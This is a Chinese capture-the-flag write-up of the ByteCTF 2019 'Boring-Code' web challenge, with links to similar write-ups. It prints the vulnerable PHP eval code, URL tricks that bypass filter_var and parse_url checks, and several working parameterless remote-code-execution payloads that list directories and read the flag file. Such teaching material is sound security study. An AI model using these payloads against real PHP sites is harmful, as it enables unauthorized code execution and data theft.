[原题复现]ByteCTF 2019 –WEB- Boring-Code[无参数rce、绕过filter_var(),等]
简介
原题复现:
考察知识点:无参数命令执行、绕过filter_var(), preg_match()
线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题
环境复现
目录
www/flag flag文件
www/code/code.php
代码
1 <?php
2 function is_valid_url($url) {
3 //FILTER_VALIDATE_URL 过滤器把值作为 URL 进行验证。
4 if (filter_var($url, FILTER_VALIDATE_URL)) {
5 if (preg_match('/data:\/\//i', $url)) {
6 return false;
7 }
8 return true;
9 }
10 return false;
11 }
12
13
14 if (isset($_POST['url'])){
15 $url = $_POST['url'];
16 if (is_valid_url($url)) {
17 $r = parse_url($url);
18 var_dump($r);
19 if (preg_match('/baidu\.com$/', $r['host'])) {
20 $code = file_get_contents($url);
21 var_dump($code);
22 if (';' === preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)) {
23 if (preg_match('/et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i', $code)) {
24 echo 'bye~';
25 } else {
26 eval($code);
27 }
28 }
29 } else {
30 echo "error: host not allowed";
31 }
32 } else {
33 echo "error: invalid url";
34 }
35 }else{
36 highlight_file(__FILE__);
37 }
审计分析

绕过第一层
1.额外知识增加(如何绕过filter_var和parse_url)
data://text/plain;base64,xxxx
data://baidu.com/plain;base64,xxxx
POST:url=data://baidu.com/plain,echo('1111')
//string(12) "echo('1111')"
0://hua.com;baidu.com //可以绕过FILTER_VALIDATE_URL过滤器
方法一:使用compress.zlib方式
url=compress.zlib://data:@baidu.com/baidu.com?,echo('1111')
方法二:购买一个xxxbaidu.com的域名(未测试)
方法三:百度网盘链接
extension=php_openssl.dll 开启PHPssl扩展
allow_url_include = On 允许引入URL文件
allow_url_fopen = On 允许打开url文件
方法四:使用ftp协议(未测试)
方法五:百度的一个任意跳转漏洞(未测试)
第二层正则绕过
第二层考点是无参数rce
<?php
$a = get_defined_functions()['internal'];
$file = fopen("function.txt","w+");
foreach ($a as $key ) {
echo fputs($file,$key."\r\n");
}
fclose($file);
?>
import re
f = open('function.txt','r')
for i in f:
function = re.findall(r'/et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log',i)
if function == [] and not '_' in i:
print(i)
方法一 phpversion()
sqrt() : 返回一个数字的平方根
tan() : 返回一个数字的正切
cosh() : 返回一个数字的双曲余弦
sinh() : 返回一个数字的双曲正弦
ceil() : 返回不小于一个数字的下一个整数 , 也就是向上取整
<?php
$list = array("ceil","sinh","cosh","tan","floor","sqrt","cos","sin");
foreach($list as $a){
foreach($list as $b){
foreach($list as $c){
foreach($list as $d){
foreach($list as $e){
foreach($list as $f){
foreach($list as $g){
foreach($list as $h){
if($a($b($c($d($e($f($g($h(phpversion())))))))) == 46)
echo "$a+$b+$c+$d+$e+$f+$g+$h"."\n";
}}}}}}}}
?>

最终payload:
url=compress.zlib://data:@baidu.com/baidu.com?,echo(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))));
参考学习:http://www.guildhab.top/?p=1077
https://xz.aliyun.com/t/6737
方法二 localtime()+localeconv()
echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));
scandir() 列出目录中的文件和目录。
end() 将内部指针指向数组中的最后一个元素,并输出。
readfile() 输出一个文件
current() 返回数组当前单元
readfile(end(scandir('.')));
pos(localeconv())
readfile(end(scandir(pos(localeconv()))));
chdir()函数改变当前的目录
next()函数将内部指针指向数组中的下一个元素,并输出。 这里可以获取到scandir()返回的".."
chdir(next(scandir(pos(localeconv()))));
localtime(timestamp,is_assoc);取得本地时间
timestamp 可选,规定Unix时间戳 如未规定则默认time()
is_assoc 可选 规定返回关联数组还是索引数组 如果FALSE则返回索引 默认False
chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))
echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));
参考学习:https://xz.aliyun.com/t/6316
方法三 if()
if(chdir(next(scandir(pos(localeconv())))))readfile(end(scandir(pos(localeconv()))));
[原题复现]ByteCTF 2019 –WEB- Boring-Code[无参数rce、绕过filter_var(),等]的更多相关文章
- [原题复现][CISCN 2019 初赛]WEB-Love Math(无参数RCE)[未完结]
简介 原题复现: 考察知识点:无参数命令执行 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 源码审计 代码 1 ...
- [原题复现]SUCTF 2019 WEB EasySQL(堆叠注入)
简介 原题复现: 1 <?php 2 session_start(); 3 4 include_once "config.php"; 5 6 $post = array() ...
- [原题复现]2019上海大学生WEB-Decade(无参数RCE、Fuzz)
简介 原题复现: 考察知识点:无参数命令执行.Fuzz 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 环境复现 ...
- [原题复现]-HITCON 2016 WEB《babytrick》[反序列化]
前言 不想复现的可以访问榆林学院信息安全协会CTF训练平台找到此题直接练手 HITCON 2016 WEB -babytrick(复现) 原题 index.php 1 <?php 2 3 inc ...
- [原题复现][极客大挑战 2019]HardSQL(updatexml报错注入)
简介 原题复现: 考察知识点:SQL注入(报错注入,绕过过滤) 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台 特别感谢!) 榆林学院内可使用信安协会内部的CTF训练平 ...
- [原题复现+审计][SUCTF 2019] WEB CheckIn(上传绕过、.user.ini)
简介 原题复现:https://github.com/team-su/SUCTF-2019/tree/master/Web/checkIn 考察知识点:上传绕过..user.ini 线上平台:h ...
- [原题复现+审计][ZJCTF 2019] WEB NiZhuanSiWei(反序列化、PHP伪协议、数组绕过)
简介 原题复现:https://github.com/CTFTraining/zjctf_2019_final_web_nizhuansiwei/ 考察知识点:反序列化.PHP伪协议.数组绕过 ...
- [原题复现]强网杯 2019 WEB高明的黑客
简介 原题复现: 考察知识点:python代码编写能力... 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 简 ...
- [原题复现]2018护网杯(WEB)easy_tornado(模板注入)
简介 原题复现: 考察知识点:模板注入 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 [护网杯 2018]eas ...
随机推荐
- SQL中 char varchar和nvarchar的区别
转至:http://www.cnblogs.com/carekee/articles/2094676.html char char是定长的,也就是当你输入的字符小于你指定的数目时,char(8) ...
- JavaScript的9大排序算法详解
一.插入排序 1.算法简介 插入排序(Insertion-Sort)的算法描述是一种简单直观的排序算法.它的工作原理是通过构建有序序列,对于未排序数据,在已排序序列中从后向前扫描,找到相应位置并插入. ...
- 使用浏览器抓取QQ音乐接口(歌曲篇)
前言 前面我们获取了歌曲的排行榜的数据,我们现在需要实现歌曲播放 前面我们写了一段函数来得到了回调的数据,现在我们需要使用这一段数据,来实现播放歌曲 完整代码 <!DOCTYPE html> ...
- unittest学习
unittest的四大特点 TestCase:测试用例.所有的用例都是直接继承与UnitTest.TestCase类. TestFixture:测试固件.setUp和tearDown分别作为前置条件和 ...
- 关于天线长度及LC值的计算
一.天线长度与波长 1.天线最佳长度计算 理论和实践证明,当天线的长度为无线电信号波长的1/4时,天线的发射和接收转换效率最高.因此,天线的长度将根据所发射和接收信号的频率即波长来决定.只要知道对应发 ...
- MongoDB复制 --- MongoDB基础用法(五)
复制 MongoDB复制是将数据同步在多个服务器的过程. 复制提供了数据的冗余备份,并在多个服务器上存储数据副本,提高了数据的可用性, 并可以保证数据的安全性. 复制还允许您从硬件故障和服务中断中恢复 ...
- 谈谈nginx和lvs各自的优缺点以及使用
在最开始呢,咱们先说一下什么叫负载均衡,负载均衡呢,就是将一批请求,根据请求的内容,分发到不同的后端去进行相应的处理,从而提供负载分担,主备切换等功能. ...
- 专题三:redis的数据类型之hash
一.基本介绍 前面一个专题我们讲到string去存储明星微博粉丝数,微博数等,大概介绍了两种方式: set user:id:012345:fans 12210862 set u ...
- 购买GPRS DTU时应该怎么选择
GPRS DTU如今是一种被广泛应用的物联网无线数据终端,主要是利用GPRS网络为用户提供无线长距离数据透传功能,在电力.环保.物流.气象等行业领域有着广泛应用.目前市场上的GPRS DTU产品眼花缭 ...
- 部署LNMP环境
1.安装nginx yum -y install gcc pcre-devel openssl-devel tar xf nginx-1.16.1.tar.gz cd nginx-1.16.1/ ./ ...